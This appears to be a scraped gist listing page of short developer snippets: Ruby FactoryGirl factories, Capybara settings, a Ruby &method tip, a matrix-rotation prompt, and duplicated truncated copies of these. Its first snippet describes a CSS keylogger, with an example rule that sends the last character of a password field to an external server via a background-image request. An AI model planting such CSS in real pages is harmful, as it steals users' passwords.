Przemyslaw Mroczek Lackoftactics

## keylogger.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                Lackoftactics
                / keylogger.md
            
            
              Created
              February 21, 2018 17:10
            
              
                keylogger css
              
          
    #How it works
This attack is really simple. Utilizing CSS attribute selectors, one can request resources from an external server under the premise of loading a background-image.
For example, the following css will select all input's with a type that equals password and a value that ends with a. It will then try to load an image from http://localhost:3000/a.
input[type="password"][value$="a"] {
background-image: url("http://localhost:3000/a");
}
Using a simple script one can create a css file that will send a custom request for every ASCII character.

  
## callbacks_hell.rb
factory :registration_active_registrant, class: Registration::Registrant do
  before(:create) do |registrant|
    registrant.class.skip_callback(:create, :before, :init)
    create(:active_registration_registrant_status) unless Registration::RegistrantStatus.exists?(name: 'Active')
  end

  completed_at Date.current
  activated_at Date.current
  status_id { Registration::RegistrantStatus::ACTIVE_ID }

## trait.rb
FactoryGirl.define do
  factory :registration_participant, class: Registration::Participant do
	  f_name { Faker::Name.first_name }
    l_name { Faker::Name.last_name }
    waiver_agree true
    token SecureRandom.hex(10)
    association :registrant, factory: :registration_registrant

    trait :skip_validate do
      registrant nil

## kill_by_port.sh
netstat -vanp tcp | grep 3000

## capybara_debug.rb
Capybara.server_port = 9887
Capybara.app_host = "http://#{ENV['APP_HOST']}:#{Capybara.server_port}"
Capybara.always_include_port = true

Capybara.register_driver :chrome do |app|
  Capybara::Selenium::Driver.new(app, browser: :chrome)
end

## rotate
You are given an n x n 2D matrix that represents an image. Rotate the image by 90 degrees (clockwise).

Example

For

a = [[1, 2, 3],
     [4, 5, 6],
     [7, 8, 9]]
the output should be

## capybara_pause.rb
def pause_capybara
    $stderr.write "
      Capybara paused!
      App running at http://localhost:#{Capybara.current_session.server.port}
      Press enter to continue..."
    $stdin.gets
end

## &method.rb
In Ruby, &method passes you!
Most Rubyists would know what the following does.

[1, 2, 3].map(&:to_s)

It takes the array of numbers, calls to_s on each item, and returns an array of the return values.

But what if you want to do the opposite? Rather than calling a method on the object, what if you want to call a method with the object as a parameter? Simple!

["1", "2", "3"].map(&method(:Integer))

## index.html
 <textarea name="comment" id="comment" cols="30" row="30" style="height:60px; width:300px" placeholder="Enter your comment..."></textarea>

## oj.rb
gem 'oj'
gem 'oj_mimic_json'

#this will make you happy
# faster json rendering using oj
	factory :registration_active_registrant, class: Registration::Registrant do
	before(:create) do \|registrant\|
	registrant.class.skip_callback(:create, :before, :init)
	create(:active_registration_registrant_status) unless Registration::RegistrantStatus.exists?(name: 'Active')
	end

	completed_at Date.current
	activated_at Date.current
	status_id { Registration::RegistrantStatus::ACTIVE_ID }
	FactoryGirl.define do
	factory :registration_participant, class: Registration::Participant do
	f_name { Faker::Name.first_name }
	l_name { Faker::Name.last_name }
	waiver_agree true
	token SecureRandom.hex(10)
	association :registrant, factory: :registration_registrant

	trait :skip_validate do
	registrant nil
	Capybara.server_port = 9887
	Capybara.app_host = "http://#{ENV['APP_HOST']}:#{Capybara.server_port}"
	Capybara.always_include_port = true

	Capybara.register_driver :chrome do \|app\|
	Capybara::Selenium::Driver.new(app, browser: :chrome)
	end
	You are given an n x n 2D matrix that represents an image. Rotate the image by 90 degrees (clockwise).

	Example

	For

	a = [[1, 2, 3],
	[4, 5, 6],
	[7, 8, 9]]
	the output should be
	def pause_capybara
	$stderr.write "
	Capybara paused!
	App running at http://localhost:#{Capybara.current_session.server.port}
	Press enter to continue..."
	$stdin.gets
	end
	In Ruby, &method passes you!
	Most Rubyists would know what the following does.

	[1, 2, 3].map(&:to_s)

	It takes the array of numbers, calls to_s on each item, and returns an array of the return values.

	But what if you want to do the opposite? Rather than calling a method on the object, what if you want to call a method with the object as a parameter? Simple!

	["1", "2", "3"].map(&method(:Integer))
	gem 'oj'
	gem 'oj_mimic_json'

	#this will make you happy
	# faster json rendering using oj